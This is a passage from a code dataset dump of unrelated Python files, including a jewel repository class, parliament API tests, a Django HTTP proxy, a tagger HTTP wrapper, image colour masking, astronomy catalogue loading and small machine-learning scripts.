#Date in: o bijuterie\n #Date out: \n for a in self.__jewelList:\n if ( a.getId() == jewel.getId() ):\n raise ValueError ( \"Exista deja o bijuterie cu id-ul \" + str( a.getIdJewel() ) )\n self.__jewelList.append ( jewel )\n \n def deleteJewel(self,idJewel):\n #Descr: sterge o bijuterie\n #Date in: id-ul bijuteriei\n #Date out:\n delAct = []\n for i in reversed(range(0,len(self.__jewelList))):\n if self.__jewelList[i].getId()==idJewel:\n delAct.append (i)\n if len(delAct) > 0: \n for delElem in delAct:\n del self.__jewelList[delElem]\n else:\n raise ValueError (\"Nu exista o bijuterie cu id-ul \" + str(idJewel))\n \n def updateJewel (self, idJewel, newJewel):\n #Descr: actualizeaza o bijuterie\n #Date in: id-ul bijuteriei si bijuteria cu care va fi inlocuita\n #Date out:\n if(self.__jewelList != []):\n for i in range (0, len(self.__jewelList)):\n if (self.__jewelList[i].getId() == idJewel):\n self.__jewelList[i] = newJewel\n else:\n raise ValueError (\"Nu exista bijuterii!\")\n \n def searchJewel(self,jewel):\n #Descr: cauta o bijuterie\n #Date in: o bijuterie\n #Date out: bijuteriea cautata\n for a in self.__jewelList:\n if(a.getIdJewel() == jewel.getId()):\n return a\n if self.__jewelList == []:\n raise ValueError ( \"Nu exista bijuterii!\" )\n else:\n raise ValueError ( \"Nu exista o bijuterie cu acest id!\" )\n \n def getAllJewel(self):\n #Descr: afiseaza toate bijuteriile\n #Date in:\n #Date out: lista cu bijuterii\n if len(self.__jewelList) > 0:\n lista_activitati = self.__jewelList[:]\n return lista_activitati\n else:\n raise ValueError (\"Nu exista bijuterii!\")\n \n def getJewel(self, idd):\n #Descr: returneaza bijuteria cu id-ul dat ca parametru\n #Date in: idd - un id de bijuterie\n #Date out: bijuteria cu id-ul = idd\n if(self.__jewelList != []):\n for i in range (0, len(self.__jewelList)):\n if (self.__jewelList[i].getId() == idd):\n return self.__jewelList[i]\n else:\n raise ValueError (\"Nu exista bijuterii!\")\n \n def getSize(self):\n #Descr: returneaza numarul de bijuterii\n #Date in:\n #Date out: numarul de bijuterii\n return len(self.__jewelList)","sub_path":"JewelRepository.py","file_name":"JewelRepository.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"417942964","text":"\n\nfrom xai.brain.wordbase.nouns._weekday import _WEEKDAY\n\n#calss header\nclass _WEEKDAYS(_WEEKDAY, ):\n\tdef __init__(self,): \n\t\t_WEEKDAY.__init__(self)\n\t\tself.name = \"WEEKDAYS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"weekday\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_weekdays.py","file_name":"_weekdays.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55560535","text":"#!/usr/bin/env python3\n# coding: utf-8\n\ndef solve(n, m):\n if n < m:\n if m % n == 0:\n return 'factor'\n elif n > m:\n if n % m == 0:\n return 'multiple'\n return 'neither'\n\n\ndef main():\n while True:\n n, m = map(int, input().split())\n if n + m == 0:\n return\n print(solve(n, m))\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"Python/SEOKCHAN/수학3/1.배수와약수.py","file_name":"1.배수와약수.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142119651","text":"from tkapi.besluit import Besluit\n\nfrom .core import TKApiTestCase\n\n\nclass TestBesluit(TKApiTestCase):\n\n def test_get_besluiten(self):\n n_items = 5\n besluit_filter = Besluit.create_filter()\n besluit_filter.filter_non_empty_zaak()\n besluiten = self.api.get_besluiten(filter=besluit_filter, max_items=n_items)\n for besluit in besluiten:\n self.assertEqual(1, len(besluit.zaken))\n self.assertIsNotNone(besluit.agendapunt.activiteit.begin)\n self.assertEqual(n_items, len(besluiten))\n\n\nclass TestBesluitFilters(TKApiTestCase):\n\n def test_kamerstukdossier_filter(self):\n n_items = 4\n vetnummer = 34822\n filter = Besluit.create_filter()\n filter.filter_kamerstukdossier(vetnummer=vetnummer)\n besluiten = self.api.get_besluiten(filter=filter, max_items=n_items)\n self.assertEqual(n_items, len(besluiten))\n for besluit in besluiten:\n self.assertEqual(vetnummer, besluit.zaak.dossier.vetnummer)\n\n def test_kamerstuk_filter(self):\n n_items = 5\n vetnummer = 33885\n volgnummer = 16\n filter = Besluit.create_filter()\n filter.filter_kamerstuk(vetnummer=vetnummer, ondernummer=volgnummer)\n besluiten = self.api.get_besluiten(filter=filter, max_items=n_items)\n self.assertEqual(1, len(besluiten))\n for besluit in besluiten:\n self.assertEqual(vetnummer, besluit.zaken[0].dossier.vetnummer)\n","sub_path":"tests/test_besluit.py","file_name":"test_besluit.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"179836718","text":"# -*- coding: utf-8 -*-\n# from https://github.com/yvandermeer/django-http-proxy\n#\n# License found in setup.py https://github.com/yvandermeer/django-http-proxy/blob/develop/setup.py\n# 'License :: OSI Approved :: MIT License'\n#\n# Authors in https://github.com/yvandermeer/django-http-proxy/blob/develop/AUTHORS\n# The Django HTTP Proxy is developed and maintained by Yuri van der Meer.\n# Many thanks to Will Larson for providing the inspiration and original source\n# code for this app:\n# http://lethain.com/entry/2008/sep/30/suffer-less-by-using-django-dev-server-as-a-proxy/\n#\n\nimport logging\nimport re\n\nfrom django.http import HttpResponse\nfrom django.utils.six.moves import urllib\nfrom django.views.generic import View\n\nlogger = logging.getLogger(__name__)\n\nREWRITE_REGEX = re.compile(r'((?:src|action|href)=[\"\\'])/(?!\\/)')\n\n\nclass HttpProxy(View):\n \"\"\"\n Class-based view to configure Django HTTP Proxy for a URL pattern.\n\n In its most basic usage::\n\n from httpproxy.views import HttpProxy\n\n urlpatterns += patterns('',\n (r'^my-proxy/(?P.*)$',\n HttpProxy.as_view(base_url='http://python.org/')),\n )\n\n Using the above configuration (and assuming your Django project is server by\n the Django development server on port 8000), a request to\n ``http://localhost:8000/my-proxy/index.html`` is proxied to\n ``http://python.org/index.html``.\n \"\"\"\n\n base_url = None\n \"\"\"\n The base URL that the proxy should forward requests to.\n \"\"\"\n\n rewrite = False\n \"\"\"\n If you configure the HttpProxy view on any non-root URL, the proxied\n responses may still contain references to resources as if they were served\n at the root. By setting this attribute to ``True``, the response will be\n :meth:`rewritten ` to try to\n fix the paths.\n \"\"\"\n\n _msg = 'Response body: \\n%s'\n\n def dispatch(self, request, url, *args, **kwargs):\n # print('URL0: {}'.format(url))\n self.url = url\n self.original_request_path = request.path\n request = self.normalize_request(request)\n\n response = super(HttpProxy, self).dispatch(request, *args, **kwargs)\n\n if self.rewrite:\n response = self.rewrite_response(request, response)\n return response\n\n def normalize_request(self, request):\n \"\"\"\n Updates all path-related info in the original request object with the\n url given to the proxy.\n\n This way, any further processing of the proxy'd request can just ignore\n the url given to the proxy and use request.path safely instead.\n \"\"\"\n # if not self.url.startswith('/'):\n # self.url = '/' + self.url\n request.path = self.url\n request.path_info = self.url\n request.META['PATH_INFO'] = self.url\n return request\n\n def rewrite_response(self, request, response):\n \"\"\"\n Rewrites the response to fix references to resources loaded from HTML\n files (images, etc.).\n\n .. note::\n The rewrite logic uses a fairly simple regular expression to look for\n \"src\", \"href\" and \"action\" attributes with a value starting with \"/\"\n – your results may vary.\n \"\"\"\n proxy_root = self.original_request_path.rsplit(request.path, 1)[0]\n response.content = REWRITE_REGEX.sub(r'\\1{}/'.format(proxy_root),\n response.content)\n return response\n\n def get(self, *args, **kwargs):\n return self.get_response()\n\n def post(self, request, *args, **kwargs):\n headers = {}\n if request.META.get('CONTENT_TYPE'):\n headers['Content-type'] = request.META.get('CONTENT_TYPE')\n return self.get_response(body=request.body, headers=headers)\n\n def get_full_url(self, url):\n \"\"\"\n Constructs the full URL to be requested.\n \"\"\"\n param_str = self.request.GET.urlencode()\n request_url = u'%s%s' % (self.base_url, url)\n request_url += '?%s' % param_str if param_str else ''\n return request_url\n\n def create_request(self, url, body=None, headers={}):\n request = urllib.request.Request(url, body, headers)\n logger.info('%s %s' % (request.get_method(), request.get_full_url()))\n return request\n\n def get_response(self, body=None, headers={}):\n request_url = self.get_full_url(self.url)\n request = self.create_request(request_url, body=body, headers=headers)\n response = urllib.request.urlopen(request, timeout=12)\n try:\n response_body = response.read()\n status = response.getcode()\n logger.debug(self._msg % response_body)\n except urllib.error.HTTPError as e:\n response_body = e.read()\n logger.error(self._msg % response_body)\n status = e.code\n return HttpResponse(\n response_body,\n status=status,\n content_type=response.headers['content-type'])\n\n\nclass HttpProxyBasicAuth(HttpProxy):\n username = None\n password = None\n\n def get_response(self, body=None, headers={}):\n # print('URL: {}'.format(self.url))\n request_url = self.get_full_url(self.url)\n request = self.create_request(request_url, body=body, headers=headers)\n\n passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n passman.add_password(None, request_url, self.username, self.password)\n authhandler = urllib.request.HTTPBasicAuthHandler(passman)\n opener = urllib.request.build_opener(authhandler)\n\n response = opener.open(request)\n try:\n response_body = response.read()\n status = response.getcode()\n logger.debug(self._msg % response_body)\n except urllib.error.HTTPError as e:\n response_body = e.read()\n logger.error(self._msg % response_body)\n status = e.code\n return HttpResponse(\n response_body,\n status=status,\n content_type=response.headers['content-type'])\n","sub_path":"webservice/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122416917","text":"# Escreva um programa que leia números inteiros do teclado.\r\n# O programa deve ler os números até que o usuário digite 0 (zero).\r\n# No final da execução, exiba a quantidade de números digitados, assim como a soma e a média aritmética.\r\n\r\nsoma = 0\r\nindice = 0\r\nwhile True:\r\n n = int(input(\"Digite um número (0 para finalizar): \\n\"))\r\n if (n == 0):\r\n break\r\n soma = soma + n\r\n indice = indice + 1\r\nprint(\"A soma é: %d\" %(soma))\r\nprint(\"Média é: %d\" %(soma / indice))\r\n","sub_path":"livro-python-nilo-ney-coutinho-menezes/5_Repeticoes/5.14.py","file_name":"5.14.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"590436756","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('Parking.jpg')\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n#BGR\nlow_1 = np.array([0, 0, 20])\nhigh_1 = np.array([180, 110, 80])\n\nlow_2 = np.array([170, 150, 140])\nhigh_2 = np.array([180, 200, 180])\n\nlow_3 = np.array([30, 200, 120])\nhigh_3 = np.array([36, 255, 170])\n\nlow_4 = np.array([70, 140, 100])\nhigh_4 = np.array([90, 230, 125])\n\nn = input(\"Parking Num:\")\n\nif n == '1':\n mask_1 = cv2.inRange(hsv, low_1, high_1)\n cv2.imshow('1', ~mask_1)\n\nif n == '2':\n mask_2 = cv2.inRange(hsv, low_2, high_2)\n cv2.imshow('2', ~mask_2)\n\nif n == '3':\n mask_3 = cv2.inRange(hsv, low_3, high_3)\n cv2.imshow('3', ~mask_3)\n\nif n == '4':\n mask_4 = cv2.inRange(hsv, low_4, high_4)\n cv2.imshow('4', ~mask_4)\n\nif cv2.waitKey(0) == 27:\n cv2.destroyAllWindows()\n","sub_path":"Colour-Detect.py","file_name":"Colour-Detect.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"188392101","text":"\"\"\"@file lsst.io.py\nContains functions to interact with the General Catalog Reader\n\"\"\"\nfrom collections.abc import Sequence\nimport os\nimport numpy as np\nfrom ..gcdata import GCData\nfrom ..galaxycluster import GalaxyCluster\nfrom ..modeling import get_reduced_shear_from_convergence\n\n\ndef load_GCR_catalog(catalog_name):\n \"\"\"Loads a catalog from GCRCatalogs\"\"\"\n import GCRCatalogs\n return GCRCatalogs.load_catalog(catalog_name)\n\n\nclass _test_catalog():\n \"\"\"Blank test catalog designed to mimic a GCRCatalogs catalog. For testing only.\"\"\"\n\n def __init__(self, n=10):\n self.n = n\n\n def __len__(self):\n return self.n\n\n def get_quantities(self, quantities, *args, **kwargs):\n out_dict = {}\n for q in quantities:\n if q == 'galaxy_id':\n out_dict[q] = np.arange(self.n)\n else:\n out_dict[q] = np.arange(0, 1, 1./self.n)\n return out_dict\n\n\ndef _make_GCR_filter(filter_name, low_bound, high_bound):\n \"\"\"Create a filter for a specified range of a certain quantity in the GCRCatalogs format.\n\n Parameters\n ----------\n filter_name: str\n Quantity to filter\n low_bound, high_bound: float\n Range of values that the quantity is restricted to\n \"\"\"\n # checking filter_name type\n if not isinstance(filter_name, str):\n raise TypeError('filter_name not string.')\n # checking for valid filter\n if low_bound >= high_bound:\n raise ValueError('Invalid range: [%d, %d]'%(low_bound, high_bound))\n\n return ['%s >= %d'%(filter_name, low_bound),\n '%s < %d'%(filter_name, high_bound)]\n\n\ndef load_from_dc2(nclusters, catalog_name, save_dir, ra_range=(-0.3, 0.3), dec_range=(-0.3, 0.3),\n z_range=(0.1, 1.5), verbose=False, _reader='GCR'):\n \"\"\"Load random clusters from DC2 using GCRCatalogs\n\n This function saves a set of random clusters loaded from a DC2 catalog. The galaxies\n selected for each cluster are cut within a rectangular projected region around the true\n cluster center. The parameters for this cut are specified by the ra_range, dec_range,\n and z_range arguments.\n\n Parameters\n ----------\n nclusters: int\n Number of clusters to load and save.\n catalog_name: str\n Name of catalog (without '.yaml')\n save_dir: str\n Path to directory in which to save cluster objects\n ra_range: length-2 array-like of floats, optional\n Range of right ascension values (in degrees) to cut galaxies relative to the cluster center\n dec_range: length-2 array-like of floats, optional\n Range of declination values (in degrees)to cut galaxies relative to the cluster center\n z_range: length-2 array-like of floats, optional\n Range of redshift values to cut galaxies relative to the cluster center\n verbose: bool\n Sets the function to print the id of each cluster while loading\n _reader: str\n Reader argument used for testing. In practice, should be default to 'GCR'.\n \"\"\"\n # check that ranges are length-2\n if len(ra_range)!=2:\n raise ValueError('ra_range incorrect length: %i'%len(ra_range))\n if len(dec_range)!=2:\n raise ValueError('dec_range incorrect length: %i'%len(dec_range))\n if len(z_range)!=2:\n raise ValueError('z_range incorrect length: %i'%len(z_range))\n\n # load catalog\n if _reader=='GCR':\n catalog = load_GCR_catalog(catalog_name)\n elif _reader=='test':\n catalog = _test_catalog(10)\n else:\n raise ValueError('Invalid reader name: %s'%_reader)\n\n # check range of nclusters\n if (nclusters<=0) | (nclusters>len(catalog)):\n raise ValueError('nclusters value out of range: %i'%nclusters)\n\n halos = catalog.get_quantities(['galaxy_id', 'halo_mass', 'redshift', 'ra', 'dec'],\n filters=['halo_mass > 1e14', 'is_central==True'])\n\n # generate GalaxyCluster objects\n for i in np.random.choice(range(len(halos['galaxy_id'])), nclusters, replace=False):\n # specify cluster information\n cl_id = halos['galaxy_id'][i]\n cl_ra = halos['ra'][i]\n cl_dec = halos['dec'][i]\n cl_z = halos['redshift'][i]\n\n if verbose:\n print(f'Loading cluster {cl_id}')\n\n # get galaxies around cluster\n\n filters = (_make_GCR_filter('ra', cl_ra+ra_range[0], cl_ra+ra_range[1])+\n _make_GCR_filter('dec', cl_dec+dec_range[0], cl_dec+dec_range[1])+\n _make_GCR_filter('redshift', cl_z+z_range[0], cl_z+z_range[1]))\n\n gals = catalog.get_quantities(['galaxy_id', 'ra', 'dec',\n 'shear_1', 'shear_2',\n 'redshift', 'convergence'],\n filters=filters)\n\n # calculate reduced shear\n g1 = get_reduced_shear_from_convergence(gals['shear_1'], gals['convergence'])\n g2 = get_reduced_shear_from_convergence(gals['shear_2'], gals['convergence'])\n\n # store the results into a GCData\n t = GCData([gals['galaxy_id'], gals['ra'], gals['dec'],\n 2*g1, 2*g2,\n gals['redshift'], gals['convergence']],\n names=('galaxy_id', 'ra', 'dec', 'e1', 'e2', 'z', 'kappa'))\n\n # save as GalaxyCluster object\n c = GalaxyCluster(unique_id=int(cl_id), ra=cl_ra, dec=cl_dec, z=cl_z,\n galcat=t)\n\n c.save(os.path.join(save_dir, '%i.p'%cl_id))\n","sub_path":"clmm/lsst/load_clusters_with_gcr.py","file_name":"load_clusters_with_gcr.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"211252347","text":"\"\"\"\nVery simple HTTP server serving as a wrapper for WCRFT2 CLI.\nHandles multipart POST request with premorph file under \"file\" name returning tagged file in ccl format.\nUsage::\n ./wcrft2_server.py []\n\n curl --form file=@path/to/file http://localhost: > output.ccl\n\"\"\"\nimport sys\nimport cgi\nfrom subprocess import Popen, PIPE\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\n\nclass WCRFT2HTTPHandler(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html; charset=utf-8')\n self.end_headers()\n\n def do_POST(self):\n self._set_headers()\n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD': 'POST'}\n )\n cmd = ['wcrft-app', 'nkjp_e2', '-i', 'premorph', '-o', 'ccl', '-']\n p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE)\n stdin_data = form.getvalue(\"file\")\n stdout_data = p.communicate(input=stdin_data)[0]\n self.wfile.write(stdout_data.strip())\n\n\ndef run(server_class=HTTPServer, handler_class=WCRFT2HTTPHandler, port=8088):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Server running at localhost:{} ...'.format(port))\n httpd.serve_forever()\n\nif __name__ == \"__main__\":\n port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8088\n run(port=port)\n","sub_path":"wcrft2_server.py","file_name":"wcrft2_server.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391170331","text":"import matplotlib.pyplot as plot\n\nfrom pydub import AudioSegment\nimport numpy as np\nimport librosa\nimport librosa.display as display\n\nfrom .image_changing import (\n crop_image,\n convert_png_to_grayscale,\n create_bmp_from_grayscale\n)\n\nimport os\nimport sys\n\nfrom cfg_load.config import (\n SOURCE,\n PROJECT_DIR,\n TMP,\n DATA\n)\n\nmy_dpi = 96\n\n\ndef convert_file(file):\n file_segment = AudioSegment.from_mp3(file)\n save_path = os.path.join(PROJECT_DIR, '{0}/{1}'.format(SOURCE, TMP))\n new_file_name = file.replace('.mp3', '.wav').split('/')[-1]\n try:\n file_segment.export(os.path.join(save_path, new_file_name), format='wav')\n except Exception as ex:\n raise ex\n else:\n return save_path, new_file_name\n\n\ndef check_file_extension(file_name):\n extension = str(file_name).split('.')[1]\n if extension == 'wav':\n return True\n return False\n\n\ndef draw_spectrogram(signal_data):\n fig = plot.figure(figsize=(signal_data.shape[1] / 100, signal_data.shape[0] / 100))\n plot.axis('off')\n fig.legend('off')\n fig.tight_layout(pad=0)\n display.specshow(librosa.amplitude_to_db(signal_data, ref=np.max), y_axis='log', x_axis='time')\n return fig\n\n\ndef create_spectrogram(file, save_dir=DATA, mode='clear'):\n need_cleaning = False\n file_name = file.split('/')[-1]\n try:\n if not check_file_extension(file):\n need_cleaning = True\n path, file_name = convert_file(file)\n file = os.path.join(path, file_name)\n except Exception as ex:\n print(ex)\n return False\n else:\n audio_data, sample_rate = librosa.load(file)\n D = np.abs(librosa.stft(audio_data, n_fft=1024, hop_length=256, win_length=1024))\n fig = draw_spectrogram(D)\n save_directory = os.path.join(PROJECT_DIR, '{0}/{1}'.format(SOURCE, save_dir))\n if mode == 'clear':\n spectrogram_path = os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, TMP,\n file_name.replace('.wav', '.png')))\n fig.savefig(spectrogram_path)\n picture_arr = crop_image(spectrogram_path)\n for picture in picture_arr:\n create_bmp_from_grayscale(convert_png_to_grayscale(picture), save_directory)\n os.remove(spectrogram_path)\n else:\n spectrogram_path = os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, save_dir,\n file_name.replace('.wav', '.png')))\n fig.savefig(spectrogram_path)\n crop_image(spectrogram_path)\n os.remove(spectrogram_path)\n if need_cleaning:\n os.remove(os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, TMP, file_name)))\n return True\n\n\nif __name__ == '__main__':\n print(sys.argv[1])\n print(PROJECT_DIR)\n create_spectrogram(sys.argv[1])","sub_path":"SoundController/Spectrogram/create_spectrogram.py","file_name":"create_spectrogram.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"381298022","text":"# -*- coding:UTF-8 -*-\nimport tensorflow as tf\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"]='3'\n#创建两个常量Tensor constant\nconst1 = tf.constant([[2,2]])\nconst2 = tf.constant([[4],[4]])\n#张量相乘\nmultiply = tf.matmul(const1,const2)\nprint(\"sess.run()之前,尝试输出multiply的值:{}\".format(multiply))\n\n#第一种创建session对象\nsess = tf.Session()\n#用session的run方法来实际运行multiply这个矩阵乘法操作\n#并且执行的结果赋值给result\nresult = sess.run(multiply)\n#打印结果\nprint(\"sess.run()后,输出multiply:{}\".format(result))\n#关闭session对话\nsess.close()\n\n\n#第二种方法来创建和关闭Session\n#用到了上下文管理器\nwith tf.Session() as sess:\n\tresult2 = sess.run(multiply)\n\tprint(\"结果是{}\".format(result2))","sub_path":"day01/code01.py","file_name":"code01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"115744746","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\ndef gradingStudents(grades):\n new = []\n for i in range (len(grades)):\n if grades[i] <= 37:\n new.append(grades[i])\n elif ((((grades[i]//5)*5)+5)-grades[i]) < 3:\n new.append((((grades[i]//5)*5)+5))\n else:\n new.append(grades[i])\n return new\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n grades_count = int(input().strip())\n\n grades = []\n\n for _ in range(grades_count):\n grades.append(int(input().strip()))\n\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","sub_path":"Grading_Students.py","file_name":"Grading_Students.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300306834","text":"\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n \n base = './data/res/k'\n l2 = []\n l4 = []\n l6 = []\n l8 = []\n for l_div in range(2,11,1):\n direc2 = base+str(l_div)+'l2.npy'\n l2.append(list(np.load(direc2))[1][0])\n for l_div in range(4,11,1):\n direc4 = base+str(l_div)+'l4.npy'\n l4.append(list(np.load(direc4))[1][0])\n for l_div in range(6,11,1):\n direc6 = base+str(l_div)+'l6.npy'\n l6.append(list(np.load(direc6))[1][0])\n for l_div in range(8,11,1):\n direc8 = base+str(l_div)+'l8.npy'\n l8.append(list(np.load(direc8))[1][0])\n \n \n l1, = plt.plot(range(2,11,1),l2,'b.-')\n l2, = plt.plot(range(4,11,1),l4,'r.-')\n l3, = plt.plot(range(6,11,1),l6,'g.-')\n l4, = plt.plot(range(8,11,1),l8,'c.-')\n# l5, = plt.plot([16,32,64],l[2],'c>-')\n \n \n \n \n new_ticks = np.linspace(2, 11, 10)\n plt.xticks(new_ticks)\n# \n# l3, = plt.plot(range(2,7,1),l[0],'b.-')\n# l4, = plt.plot(range(3,7,1),l[1],'ro-')\n# l5, = plt.plot(range(4,7,1),l[2],'c>-')\n# l6, = plt.plot(range(6,11,1),l[3],'m,-')\n# l7, = plt.plot(range(7,11,1),l[4],'k*-')\n \n plt.legend(handles = [l1,l2,l3,l4,], labels = ['l=2','l=4','l=6','l=8',], loc = 'best')\n plt.xlabel('k')\n plt.ylabel('Average of Position Loss [Km^2]')\n \n plt.savefig('test_loc.png',dpi=500)\n","sub_path":"code/plt_loc.py","file_name":"plt_loc.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223075616","text":"import requests\nfrom urllib.parse import quote\n\nlua = '''\nfunction main(splash)\n return \"世界,你好\"\nend\n'''\n\nurl = 'http://localhost:8050/execute?lua_source=' + quote(lua)\nresponse = requests.get(url)\nprint(response.text)\n\nlua = '''\nfunction main(splash)\n splash:go(\"https://weather.com\")\n splash:wait(3)\n return {\n html = splash:html(),\n png = splash:png()\n \n }\nend\n\n'''\nurl = 'http://localhost:8050/execute?lua_source=' + quote(lua)\nresponse = requests.get(url)\nimport json\nimport base64\njson_obj = json.loads(response.text)\npng_base64 = json_obj['png']\npng_bytes = base64.b64decode(png_base64)\n\nwith open('weather.png','wb') as f:\n f.write(png_bytes)\n","sub_path":"splash/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135147173","text":"from styx_msgs.msg import TrafficLight\nimport cv2\nimport numpy as np\nfrom keras.models import model_from_json\nimport rospy\nimport os\nimport tensorflow\n\n\nclass TLClassifier(object):\n def __init__(self):\n with open('model.json', 'r') as jfile:\n self.model = model_from_json(jfile.read())\n self.model.load_weights('model.h5', by_name=True)\n self.model._make_predict_function()\n self.graph = tensorflow.get_default_graph()\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n Args:\n image (cv::Mat): image containing the traffic light\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n \"\"\"\n\n resize_image = cv2.resize(image, (160, 80))\n hls_image = cv2.cvtColor(resize_image, cv2.COLOR_BGR2HLS)\n processed_image = (hls_image.astype(np.float32) / 255.0) + 0.01\n final_4d = np.expand_dims(processed_image, axis=0)\n\n network_label = self.model.predict_classes(final_4d)[0][0]\n\n\n # rospy.logwarn(a)\n # if network_label == 1:\n # return 1\n # else:\n # return 0\n\n rospy.logwarn(network_label)\n if network_label >= 1:\n return TrafficLight.GREEN\n else:\n return TrafficLight.RED\n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98767703","text":"import logging\nimport os.path\nimport sys\nfrom gensim.corpora import WikiCorpus\n\nif __name__ == '__main__':\n program = os.path.basename(sys.argv[0])\n logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(program)\n logger.info('running ' + program + ': parse the chinese corpus')\n\n # define the filename of input and output\n infile = 'data/zhwiki-20191120-pages-articles-multistream.xml.bz2'\n outfile = 'data/zhwiki.txt'\n\n # transform .XML to .txt\n i = 0\n output = open(outfile, 'w')\n wiki = WikiCorpus(infile, lemmatize=False, dictionary={})\n for text in wiki.get_texts():\n output.write(\" \".join(text) + \"\\n\")\n i = i + 1\n if i % 10000 == 0:\n logging.info(\"Save \" + str(i) + \" articles\")\n output.close()\n logging.info(\"Finished saved \" + str(i) + \"articles\")\n","sub_path":"XML2txt.py","file_name":"XML2txt.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"72707258","text":"\r\nimport glob, os, shutil\r\nfrom datetime import *\r\nimport time\r\nimport timestring\r\n\r\nRootDir1 = r'Y:/30_Park_Pilot/06_Statii/540 Flash/00_Log files'\r\nTargetFolder = r'C:/DAN/01_Work/LP Flash/00_log_files/00_Data_Source/01_Flash540'\r\n\r\nweek = timestring.Date('27 Mar 2014 12:32:29 GMT').year\r\nprint (week)\r\n\r\nfor root, dirs, files in os.walk((os.path.normpath(RootDir1)), topdown=False):\r\n for name in files:\r\n path = os.path.join(root,name)\r\n #print (name)\r\n date = os.path.getctime(path)\r\n \r\n times = time.localtime()\r\n print (times)\r\n ARN, extension = os.path.splitext(name)\r\n link = os.path.join(TargetFolder,name)\r\n SourceFolder = os.path.join(root,name)\r\n #print (SourceFolder)\r\n current_time = time.time()\r\n #timedelta (current_time, date)\r\n #print (timedelta)\r\n #print (2 + current_time)\r\n days = (current_time - date)//(24 * 3600)\r\n #print(days)\r\n if (days)<= 10:\r\n print (\"New file found\")\r\n print (days) \r\n if os.path.exists(link):\r\n print (\"log duplicate\")\r\n file = os.path.join(TargetFolder, ARN)\r\n linkfn = os.path.join(TargetFolder, name)\r\n if os.path.exists(linkfn):\t\r\n i = 1\r\n #print (\"Path exists already\")\r\n while os.path.exists(file + \"(\"+ str(i)+ \")\" + extension):\r\n i+=1\r\n #print (\"Already 2x exists...\")\r\n print (ARN + \"Renaming\")\r\n shutil.copy2(SourceFolder, file + \"(\"+ str(i) + \")\" +extension)\r\n else: \r\n shutil.copy2(SourceFolder, TargetFolder)\t\t\t\t\r\n print (ARN + \" \" + \" copied\")\r\n else:\r\n # pass\r\n print (\"Older files\")\r\n else:\r\n\t\t \r\n print (ARN + \" \" + \"Wrong folder/format\") ","sub_path":"02_python_files/04_Handle_Data/01_Group_by/Copy_Time_1 day.py","file_name":"Copy_Time_1 day.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"63910885","text":"\nfrom flask import 